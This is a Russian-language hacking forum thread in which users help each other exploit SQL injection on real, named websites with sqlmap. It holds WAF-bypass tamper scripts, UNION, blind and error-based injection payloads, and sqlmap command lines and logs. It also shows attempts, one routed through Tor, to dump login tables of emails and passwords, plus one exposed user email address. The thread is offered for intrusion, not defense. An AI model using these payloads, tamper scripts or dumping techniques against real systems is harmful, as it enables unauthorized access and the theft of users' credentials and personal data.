payload = payload.replace("table_schema", "/*!12345%74able_schema*/")
payload = payload.replace("table_name", "/*!12345%74able_name*/")
payload = payload.replace("SCHEMA", "%73CHEMA")
payload = payload.replace("schema", "%73chema")
return payload
и играешься как хочешь, с нужными функциями
hibar1Xs
19.03.2019, 10:54
BenderMR said:
↑ (https://antichat.live/posts/4294126/)
Спасибо, то что нужно. А как расширить данный функционал для /*!50000information_schema*/.tables etc. Пробовал переписать немного этот тампер, но не вышло.
Может есть кто то делал подобные тамперы под informatio_schema?
В repStr перечислять нужное через "|" (регистр неважен) и экранировать спец. символы :
Code:
#!/usr/bin/env python
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHER
def tamper(payload, **kwargs):
def process(match):
word = match.group('word')
return match.group().replace(word, "/*!12345%s*/" % word)
retVal = payload
if payload:
repStr = "table_name|information_schema"
retVal = re.sub(r"(?P" + repStr + ")", lambda match: process(match), retVal,flags=re.IGNORECASE)
return retVal
Доброго здоровья всем форумчанам!
Начал более глубоко вникать в построение запросов. За основу взял sqlmap. Опишу две ситуации которые мне не удалось никак для себя объяснить.
Ситуация 1
Есть некий сайт, который я раскрутил руками с помощью UNION и получил имя текущей БД. Дальше двигаться не стал. Никакого WAV там нет, тестил whatwav. Ну и вручную всё вошло без лишних вопросов. Заряжаю в sqlmap, --technique=U. В итоге, sqlmap крутил-крутил, потом сказал «ой, всё!» и выдал, что слишком много ошибок 404 и сослался на WAF. WTF?
Ситуация 2
Сайт полностью раскручен sqlmap и снова --technique=U. В данный момент вникаю именно в эту технику. Получаю список БД. Там же, в конце процесса sqlmap выдает готовый payload с помощью которого он получил результат. Я понимаю sql и мне всё понятно. Беру этот payload, вставляю в броузер. В итоге выдаёт ошибку синтаксиса. Почему?
Буду благодарен любой помощи в решении этих проблем.
noj said:
↑ (https://antichat.live/posts/4294405/)
Привет, посоветовали обратиться к вам. Весь день игрался с sqlmap. Добрался до дб, но вот получить столбцы никак.
Запрос: -u "
https://www.site.com/ParticipationList.asp?Program=TCTS (https://www.site.com/ParticipationList.asp?Program=list)
" --random-agent --risk=1 --level=1 --timeout=10 -D master --tables --threads 10 --hex
Отдает пустые значения, в другой базе из 68 столбцов показало 2: А и 5. Использовал темперы: ifnull2casewhenisnull, between, charunicodeencode и ещё с десяток. Результат на месте.
Подскажет может кто в чем ошибка.
Code:
[20:06:20] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[20:06:20] [PAYLOAD] TCTS' IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(COUN T(name) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM master..sysobjects WHERE xtype = CHAR(85)),1,1))>48) WAITFOR DELAY '0:0:5'--
[20:06:20] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[20:06:20] [PAYLOAD] TCTS' IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(COUN T(name) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM master..sysobjects WHERE xtype = CHAR(85)),1,1))>1) WAITFOR DELAY '0:0:5'--
[20:06:21] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[20:06:21] [INFO] retrieved:
[20:06:21] [DEBUG] performed 4 queries in 1.94 seconds
[20:06:21] [WARNING] unable to retrieve the number of tables for database 'master'
[20:06:21] [CRITICAL] unable to retrieve the tables for any database
[20:06:21] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 24 times
[20:06:21] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
тип:
Code:
Parameter: Program (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Program=TCTS' AND 1076=1076 AND 'glgo'='glgo
Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
Payload: Program=TCTS' WAITFOR DELAY '0:0:5'--
Попробуйте утилиту whatwav. Она определяет тип WAF и тампер(ы), который нужно использовать. Но это не факт. Попробуйте руками. Здесь на борде есть статьи как обходить WAV
BenderMR
22.03.2019, 03:03
Джентельмены, реально ли через sqlmap обновить поле в колонке читая текст из filename.txt используя --sql-shell?
Что то типа UPDATE tablename SET textcolumn= filename.txt WHERE id=1?
P.S есть ли вообще такая возможность, чтобы текст со своего файла туда залить и как такой запрос должен выглядить
hibar1Xs
22.03.2019, 12:13
BenderMR said:
↑ (https://antichat.live/posts/4295082/)
Джентельмены, реально ли через sqlmap обновить поле в колонке читая текст из filename.txt используя --sql-shell?
Что то типа UPDATE tablename SET textcolumn= filename.txt WHERE id=1?
P.S есть ли вообще такая возможность, чтобы текст со своего файла туда залить и как такой запрос должен выглядить
Если SELECT, то обновить можно при условии запроса в бд через mysqli_multi_query или PDO::query. Или тип бд mssql.
Если INSERT, то можно обновить поле при наличии PRIMARY KEY в таблице.
https://dev.mysql.com/doc/refman/8.0/en/insert-on-duplicate.html
В SET textcolumn = 'содержимое filename.txt'
hibar1Xs
22.03.2019, 13:57
MrBa said:
↑ (https://antichat.live/posts/4294246/)
Доброго здоровья всем форумчанам!
Начал более глубоко вникать в построение запросов. За основу взял sqlmap. Опишу две ситуации которые мне не удалось никак для себя объяснить.
Ситуация 1
Есть некий сайт, который я раскрутил руками с помощью UNION и получил имя текущей БД. Дальше двигаться не стал. Никакого WAV там нет, тестил whatwav. Ну и вручную всё вошло без лишних вопросов. Заряжаю в sqlmap, --technique=U. В итоге, sqlmap крутил-крутил, потом сказал «ой, всё!» и выдал, что слишком много ошибок 404 и сослался на WAF. WTF?
Ситуация 2
Сайт полностью раскручен sqlmap и снова --technique=U. В данный момент вникаю именно в эту технику. Получаю список БД. Там же, в конце процесса sqlmap выдает готовый payload с помощью которого он получил результат. Я понимаю sql и мне всё понятно. Беру этот payload, вставляю в броузер. В итоге выдаёт ошибку синтаксиса. Почему?
Буду благодарен любой помощи в решении этих проблем.
sqlmap генерирует свой префикс и суффикс. Если использовался при раскрутке, то укзать через --prefix --suffix.
https://github.com/sqlmapproject/sqlmap/wiki/Usage
скуля в юнион
мускул(MariaDB fork)
проблема с кодировкой password (blob)
вид:| Linkinsgirl69@yahoo.com (mailto:Linkinsgirl69@yahoo.com) | G/\x12\\?ЦУ?дЬЧП?XP_ | 2 |
попробывал выводить с --binary-fields=password , c --hex , вид не меняется .
Есть ли способы вытащить пароль в нормальном виде?
BabaDook
24.03.2019, 23:13
Xsite said:
↑ (https://antichat.live/posts/4295815/)
скуля в юнион
мускул(MariaDB fork)
проблема с кодировкой password (blob)
вид:|
Linkinsgirl69@yahoo.com (mailto:Linkinsgirl69@yahoo.com)
| G/\x12\\?ЦУ?дЬЧП?XP_ | 2 |
попробывал выводить с --binary-fields=password , c --hex , вид не меняется .
Есть ли способы вытащить пароль в нормальном виде?
C чего взял что blob?
BabaDook said:
↑ (https://antichat.live/posts/4295834/)
C чего взял что blob?
https://ibb.co/tPj2GD0
BabaDook
24.03.2019, 23:21
Xsite said:
↑ (https://antichat.live/posts/4295835/)
https://ibb.co/tPj2GD0
хм... случайно не так --common-column. Даже не знаю что можно сделать, если только в аски вытаскивать,дальше декодировать...
BabaDook said:
↑ (https://antichat.live/posts/4295836/)
хм... случайно не так --common-column. Даже не знаю что можно сделать, если только в аски вытаскивать,дальше декодировать...
не понял причем тут комон-колум , но ладно ) хз что с этим делать , первый раз такое вижу
BabaDook
24.03.2019, 23:35
Xsite said:
↑ (https://antichat.live/posts/4295837/)
не понял причем тут комон-колум , но ладно ) хз что с этим делать , первый раз такое вижу
когда я я брутил колонки так --common-column У меня подобная фигня была..
BabaDook said:
↑ (https://antichat.live/posts/4295842/)
когда я я брутил колонки так --common-column У меня подобная фигня была..
Нет колонки и вся прочая инфа збс выводится . судя по всему это никак не победить )
BabaDook
25.03.2019, 03:23
Xsite said:
↑ (https://antichat.live/posts/4295888/)
Нет колонки и вся прочая инфа збс выводится . судя по всему это никак не победить )
В лс кинь,может придумаемм что-то
RedHazard
05.04.2019, 22:43
Помогите крутануть
[21:12:05] [INFO] Host parameter 'Host' appears to be 'MySQL OR time-based blind (ELT - comment)' injectable
[21:36:03] [INFO] heuristic (XSS) test shows that GET parameter 'call' might be vulnerable to cross-site scripting (XSS) attacks
.SpoilerTarget" type="button">Spoiler: site
http://wiki.timezero.ru/lib/exe/ajax.php?call=1
exT1ma4ka
10.04.2019, 15:44
доброго времени суток.
знаем, что в параметре blind-inj: при AND 1=1 - выводит Access Denied, при AND 1=0 - обычная страница. sqlmap не видит её, лишь что ему access denied выдают. как ему намекнуть что это верный возврат?
WAF: KONA Security Solutions (Akamai Technologies)
--
ответ: --code=403
--
что не помогло в случае с данной WAF
ruvtshow
27.04.2019, 14:13
Помогите разобраться, постоянно прости токен при запуске, конкретно по этой ссылке, при этом через Sqli Dumper. база сливается спокойно, но криво.
https://paste.pics/5EOE3
Как с этим бороться?
GET parameter 'carttoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests?
и чтобы не выбрал по итогу:
.SpoilerTarget" type="button">Spoiler: КОД
[13:42:18] [INFO] testing connection to the target URL
[13:42:25] [INFO] heuristics detected web page charset 'ISO-8859-2'
[13:42:25] [INFO] testing if the target URL content is stable
[13:42:32] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] с
[13:42:43] [INFO] ignoring GET parameter 'carttoken'
[13:42:43] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
ending @ 13:42:43 /2019-04-27/
'action' is not recognized as an internal or external command,
operable program or batch file.
'ItemID' is not recognized as an internal or external command,
operable program or batch file.
'category' is not recognized as an internal or external command,
operable program or batch file.
'viewby' is not recognized as an internal or external command,
operable program or batch file.
'sortorder' is not recognized as an internal or external command,
operable program or batch file.
исход всегда один и тот же.
Просто я понять не могу, везде про csrf и anti-csrf пишут и показывают, речь идет о входа куда либо (usernameassword)
А это обычная страница с описанием товара. токен она отсылает, а где взять anti-csrf - ума не приложу.
BabaDook
28.04.2019, 06:44
ruvtshow said:
↑ (https://antichat.live/posts/4303704/)
Помогите разобраться, постоянно прости токен при запуске, конкретно по этой ссылке, при этом через Sqli Dumper. база сливается спокойно, но криво.
https://paste.pics/5EOE3
Как с этим бороться?
GET parameter 'carttoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests?
и чтобы не выбрал по итогу:
Spoiler: КОД
[13:42:18] [INFO] testing connection to the target URL
[13:42:25] [INFO] heuristics detected web page charset 'ISO-8859-2'
[13:42:25] [INFO] testing if the target URL content is stable
[13:42:32] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] с
[13:42:43] [INFO] ignoring GET parameter 'carttoken'
[13:42:43] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
ending @ 13:42:43 /2019-04-27/
'action' is not recognized as an internal or external command,
operable program or batch file.
'ItemID' is not recognized as an internal or external command,
operable program or batch file.
'category' is not recognized as an internal or external command,
operable program or batch file.
'viewby' is not recognized as an internal or external command,
operable program or batch file.
'sortorder' is not recognized as an internal or external command,
operable program or batch file.
исход всегда один и тот же.
Просто я понять не могу, везде про csrf и anti-csrf пишут и показывают, речь идет о входа куда либо (username
assword)
А это обычная страница с описанием товара. токен она отсылает, а где взять anti-csrf - ума не приложу.
Что-то не понятное ты в водишь
ruvtshow
28.04.2019, 23:41
Да, так и естьб поменял параметр на другой, и все стало впорядке, теперь возникла другая проблема.
При попытке дампа нужных мне строк, выдает вот такое:
.SpoilerTarget" type="button">Spoiler: code
[WARNING] unable to retrieve the entries of columns 'EmailAddress, Password, Permissions, Username' for table 'logins' in database 'БЛАБЛАБЛА' (permission denied)
[22:36:01] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[22:36:01] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
Как это обойти?
BabaDook
29.04.2019, 00:01
Соединение рвётся, или ещё что-то waf как показывает лог
ruvtshow
29.04.2019, 01:11
Вот все, что выдает
.SpoilerTarget" type="button">Spoiler
RAW_TRACE
at cfindex2ecfm1932376464.runPage(C:\home\БЛАБЛ БЛА\wwwroot\index.cfm:86)
TEMPLATE
C:\home\БЛАБЛАБЛА\wwwroot\index.cfm
TYPE
CFML
Token:
0
[00:07:59] [WARNING] unable to retrieve the entries of columns 'EmailAddress' for table 'logins' in database 'БЛАБЛАБЛА' (permission denied)
[00:07:59] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[00:07:59] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
Доброго времени суток.
Имеется вот такой результат со сканера:
www.site (http://www.site)/forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*//page/ (http://www.bodycontact.com/forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(2 5))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20S LEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20 (SELECT%20SLEEP(25))A)))OR%22*%2f/page/)
Подскажите как правильно составить запрос для sqlmap
BabaDook
29.04.2019, 21:15
vladF said:
↑ (https://antichat.live/posts/4304226/)
Доброго времени суток.
Имеется вот такой результат со сканера:
www.site (http://www.site)
/forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*//page/ (http://www.bodycontact.com/forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(2 5))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20S LEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20 (SELECT%20SLEEP(25))A)))OR%22*%2f/page/)
Подскажите как правильно составить запрос для sqlmap
sqlmap -u "http://www.site (http://www.site/)/forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa*/page/ (http://www.bodycontact.com/forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(2 5))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20S LEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20 (SELECT%20SLEEP(25))A)))OR%22*%2f/page/) " --dbs
Как уработать ресурс до конца?
starting at 06:41:49
[06:41:49] [INFO] parsing HTTP request from 'r.txt'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[06:41:51] [INFO] resuming back-end DBMS 'microsoft access'
[06:41:51] [INFO] testing connection to the target URL
[06:41:53] [INFO] heuristics detected web page charset 'windows-1251'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.bok-o-bok.ru:80/filmoteka.asp?film=412 AND 9579=9579&lan=2
---
[06:41:53] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
[06:41:53] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[06:41:53] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[06:41:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[06:41:53] [INFO] retrieved:
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in further requests? [Y/n] y
[06:41:56] [INFO] heuristics detected web page charset 'ascii'
[06:41:56] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[06:41:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[06:41:56] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[06:41:56] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q] y
which common tables (wordlist) file do you want to use?
[1] default 'C:\Python27\sqlmap\txt\common-tables.txt' (press Enter)
[2] custom
> 1
[06:42:03] [INFO] checking table existence using items from 'C:\Python27\sqlmap\txt\common-tables.txt'
[06:42:03] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 4
[06:42:13] [INFO] starting 4 threads
[06:45:57] [WARNING] no table(s) found
No tables found
[06:45:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3143 times
aparsera
31.05.2019, 13:56
Есть boolean based такого формата x.php?q=1' OR 1=1 OR 'bla'='bla
Но мап ее не видит, подозреваю из-за OR OR
Думаю, что надо подправить boolean_blind.xml, верно? кто может помочь правильно составить правило?
upd
изменил, теперь видит иньекцию, но говорит что false-positive, как это исправить?
OR boolean-based blind - WHERE or HAVING clause
1
1
1
1,9
2
OR [INFERENCE]
%27OR 1=1 OR %273%27=%273
%27OR 1=2 OR %273%27=%273
[03:55:45] [INFO] GET parameter 'q' appears to be 'OR boolean-based blind - WHER
E or HAVING clause' injectable
[03:55:51] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[03:56:05] [WARNING] in OR boolean-based injection cases, please consider usage
of switch '--drop-set-cookie' if you experience any problems during data retriev
al
[03:56:05] [INFO] checking if the injection point on GET parameter 'q' is a fals
e positive
[03:56:05] [WARNING] false positive or unexploitable injection point detected
[03:56:05] [WARNING] GET parameter 'q' does not seem to be injectable
winstrool
31.05.2019, 15:42
чтоб sqlmap видел вектор через OR нужно указать --risk=3
Timon B.
20.06.2019, 18:08
Как можно обойти Cloudflare email protection, когда вместо емейлов в дампе : /cdn-cgi/l/email-protection" class="cf_email" data-
Нашел IP за Cloudflare, поставил его в hosts фаил в Windows. Но sqlmap/python это игнорит.
Спасибо
den4ik1090
20.06.2019, 21:45
Подскажите как в мапе докрутить:
https://i.ibb.co/8stgNgD/1.png
Всем привет, кто может, помогите долбануть этот сайт:
Code:
http://wrappers.ru/?act=polls&poll=1%22%27
erwerr2321
21.06.2019, 22:56
sepo said:
↑ (https://antichat.live/posts/4314718/)
помогите долбануть этот сайт
Что значит долбануть?
Привет..
BabaDook
21.06.2019, 23:07
sepo said:
↑ (https://antichat.live/posts/4314718/)
Всем привет, кто может, помогите долбануть этот сайт:
Code:
http://wrappers.ru/?act=polls&poll=1%22%27
1- вы ошиблись разделом
2- там waf
3- не ясно что вы ходите. Задайте точный вопрос или опишите проблему.
Code:
http://wrappers.ru/?act=polls&poll=1"+and+substring(@@version,1,1)=5+--+-
hubby666
24.06.2019, 04:28
Всем привет, такой вопрос - есть куча ссылок которые нужно пройти, отдаю их мапу и ухожу, как сделать чтобы уязвимые ссылки как-то помечались, потому что он в аутпут складывает все как я понимаю, без разбора, то есть все пройденные. Спасибо.
winstrool
08.07.2019, 15:54
man474019 said:
↑ (https://antichat.live/posts/4318175/)
Hi
sqlmap dumps all data in table, but I want to dump specify columns in that table, but sqlmap doesn't retrieve any data
I try --hex --no-cast tamper scripts (unionalltounion, between) but no result
What can you advice for help ?
Thanks !
Проверьте запрос в ручную на что срабатывает WAF,обходите его и пишите свой tamper под него.
BabaDook
08.07.2019, 20:51
man474019 said:
↑ (https://antichat.live/posts/4318220/)
interesting is that, sqlmap dumps username column, but can not dump email and password columns..but when dump all table, sqlmap dumps normally
it happens, use the old version
BenderMR
02.08.2019, 12:57
День добрый, господа.
Есть такая скуль:
Code:
https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27,%20extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
Где вроде как insert statement, потому что если после ' не добавить еще один параметр через запятую, то выдается такая ошибка:
Code:
Column count doesn't match value count at row 1
Подскажите, реально ли такое засунуть в мап и как это сделать?
LeninDie
05.08.2019, 09:56
привет. подскажите как мапу указать на то какие данные меняются? скуля слепая
в куках уязвим параметр identifyId: amplitude_idundefined={"optOut":false,"sessionId":null,"lastEventTime":null,"eventId":0,"identifyId":027179381' or 3726=3726--,"sequenceNumber":0} я так понимаю нужно добавить --string="а вот что здесь хз"
https://i.imgur.com/F8Qm7HK.jpg
LeninDie said:
↑ (https://antichat.live/posts/4323442/)
привет. подскажите как мапу указать на то какие данные меняются? скуля слепая
у вас ответ а не запрос
LeninDie
05.08.2019, 14:04
b3 said:
↑ (https://antichat.live/posts/4323462/)
у вас ответ а не запрос
дополнил
BenderMR said:
↑ (https://antichat.live/posts/4322804/)
День добрый, господа.
Есть такая скуль:
Code:
https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27,%20extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
Где вроде как insert statement, потому что если после ' не добавить еще один параметр через запятую, то выдается такая ошибка:
Code:
Column count doesn't match value count at row 1
Подскажите, реально ли такое засунуть в мап и как это сделать?
Делайте через
Code:
https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27*extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27-extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27/extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
и вариации
LeninDie
07.08.2019, 11:04
LeninDie said:
↑ (https://antichat.live/posts/4323442/)
привет. подскажите как мапу указать на то какие данные меняются? скуля слепая
в куках уязвим параметр identifyId: amplitude_idundefined={"optOut":false,"sessionId":null,"lastEventTime":null,"eventId":0,"identifyId":027179381' or 3726=3726--,"sequenceNumber":0} я так понимаю нужно добавить --string="а вот что здесь хз"
https://i.imgur.com/F8Qm7HK.jpg
может кто нибудь подсказать решение?
Baskin-Robbins
07.08.2019, 11:38
LeninDie said:
↑ (https://antichat.live/posts/4323994/)
может кто нибудь подсказать решение?
Ищи строку, которая всегда присутствует на неижектированной странице и неизменна(обязательно), но отсутствует при внедрении и false ответе
Если добавляется какая-либо строка при false то использовать нужно --not-string="bsdhbhsb" , но при условии если она отсутствует при тру ответе
По крайней мере так написано в манах
BenderMR
07.08.2019, 16:24
LeninDie said:
↑ (https://antichat.live/posts/4323994/)
может кто нибудь подсказать решение?
Ты скидывешь скрин ответа, нужен скрин запроса
Такой вопрос.
Есть колонка Type допустим, строк 100к+, практически везде колонка пустая, но в некоторых есть данные.
Можно ли как то сдампить только те что содержат данные?
Какие там данные я не знаю, так можно было бы --where указать
Baskin-Robbins
14.09.2019, 00:42
Estet said:
↑ (https://antichat.live/posts/4331485/)
Такой вопрос.
Есть колонка Type допустим, строк 100к+, практически везде колонка пустая, но в некоторых есть данные.
Можно ли как то сдампить только те что содержат данные?
Какие там данные я не знаю, так можно было бы --where указать
where=Type != NULL
или так
where=Type != ''
Спасибо за помощь. Еще один, последний вопрос.
Можно ли как то указать подобную конструкцию --where=email=.....@site.com
Тоесть сдампить по электронке на указаном домене?
Baskin-Robbins
14.09.2019, 01:32
Estet said:
↑ (https://antichat.live/posts/4331489/)
Спасибо за помощь. Еще один, последний вопрос.
Можно ли как то указать подобную конструкцию --where=email=.....@site.com
Тоесть сдампить по электронке на указаном домене?
--where=email LIKE '%@site.com'
но не уверен, сейчас проверил на sqlmap - не хочет работать, хотя вручную все работает
да к сожалению не работает( но все равно спасибо
pacojaveh
14.09.2019, 13:00
Всем привет,помогите пожалуйста ситуация такая:
Appspider(Rapid7) находит sql уязвимость "Double-float overflow" отправляя значение "1e309" как данные POST запросом,в ответе Mysql2::Error: Unknown column 'Infinity' in 'field list': INSERT INTO `interactions` (`accept_langs`, `browser`, `browser_version`....перечисление всех колонок) при ЛЮБЫХ других значениях кроме "1e309(и выше 1e310..)" ошибки НЕТ,sqlmap не может раскрутить ее,пробовал фазерам через owasp большим списком также ошибок других не нашлось реакция только на 1e309.
И из всего этого вопрос как ее раскрутить в sqlmap?готов оплатить за помощь если кто знает как решить,моя телега @S920799
karkajoi
14.09.2019, 13:10
Baskin-Robbins said:
↑ (https://antichat.live/posts/4331496/)
--where=email LIKE '%@site.com'
но не уверен, сейчас проверил на sqlmap - не хочет работать, хотя вручную все работает
Estet said:
↑ (https://antichat.live/posts/4331498/)
да к сожалению не работает( но все равно спасибо
--where="email='admin@admin.com (mailto:admin@admin.com)'" так будет работать
[QUOTE="ex3x1"]
ex3x1 said:
↑ (https://antichat.live/posts/4331577/)
Приветствую! Acunetix'ом обнаружена Blind SQLinj:
Code:
GET /rent.php?country=179&method=get_mobile_count&operator=4&services=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&timereset=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://site.org/
Cookie: PHPSESSID=c2907islgb685fdbo0u6h5im40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: site.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Далее лог SQLmap'а:
PHP:
sqlmap.py-u"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"--random-agent--tor--tor-type=SOCKS5--risk=3--level=5--dbs
___
__H__
___ ___[.]_____ ___ ___{1.3.9.9#dev}
|_-| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for atta cking targets without prior mutual consent i s illegal. It is the end user's responsibil ity to
obey all applicable local,stateandfederal laws .Developers assume no liabilityandare not res ponsibleforany misuseordamage caused by
this program
starting@12:57:35/2019-09-14/
[12:57:35] [WARNING]increasingdefaultvalueforoption'--time-sec'to 10 becauseswitch'--tor'was provided
[12:57:35] [INFO]setting Tor SOCKS proxy settings
[12:57:36] [INFO]fetched random HTTP User-Agent header value'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) Appl eWebKit/535.11 (KHTML, lik
e Gecko) Chrome/17.0.963.66 Safari/535.11'from file'user-agents.txt'
custom injection marker('*')found in option'-u'. Doyou want to process it? [Y/n/q]y
[12:57:38] [INFO]testing connection to the target URL
[12:57:39] [INFO]checkingifthe target isprotectedby some kind of WAF/IPS
[12:57:40] [INFO]testingifthe target URL content is stable
[12:57:40] [INFO]target URL content is stable
[12:57:40] [INFO]testingifURI parameter'#1*'is dynamic
[12:57:41] [INFO]URI parameter'#1*'appears to be dynamic
[12:57:41] [WARNING]heuristic(basic)test shows that URI parameter' #1*'might not be injectable
[12:57:42] [INFO]testingforSQL injection on URI parameter'#1*'
[12:57:42] [INFO]testing'AND boolean-based blind - WHERE or HAVING clause'
[12:57:50] [INFO]URI parameter'#1*'appears to be'AND boolean-based blind - WHERE or HAVING clause'injectable
[12:57:57] [INFO]testing'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (BIGINT UNSIGNED)'
[12:57:57] [INFO]testing'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:57:58] [INFO]testing'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (EXP)'
[12:57:58] [INFO]testing'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:57:59] [INFO]testing'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (JSON_KEYS)'
[12:57:59] [INFO]testing'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:58:00] [INFO]testing'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (FLOOR)'
[12:58:00] [INFO]testing'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (FLOOR)'
[12:58:01] [INFO]testing'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (EXTRACTVALUE)'
[12:58:01] [INFO]testing'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (EXTRACTVALUE)'
[12:58:02] [INFO]testing'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (UPDATEXML)'
[12:58:02] [INFO]testing'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (UPDATEXML)'
[12:58:03] [INFO]testing'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (FLOOR)'
